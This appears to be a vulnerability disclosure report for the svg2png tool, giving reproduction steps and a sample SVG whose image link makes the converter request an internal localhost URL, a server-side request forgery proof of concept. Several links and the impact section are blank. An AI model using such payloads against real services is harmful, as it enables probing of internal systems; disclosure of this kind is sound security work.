Server-Side Request Forgery (SSRF) in sterlp/svg2png


Reported on

Jan 28th 2021

:book: Description

Svg2Png Manage your Icons in SVG and generate the needed PNG into your projects as needed. No "Web Service" needed, just an executable JAR file. this package is vulnerable to (XXE).

:recycle: Steps To Reproduce-:

  1. download and run latest release from
  2. You have to have Java 8 installed on your PC
  3. creat a payload svg or use : (this is a example of SSRF )


<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="" xmlns="" xmlns:xlink="" style="overflow: hidden; position: relative;" width="300" height="200">
<image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg" stroke-width="1" id="image3204" />
<rect x="0" y="150" height="10" width="300" style="fill: black"/>



💥 Impact


to join this conversation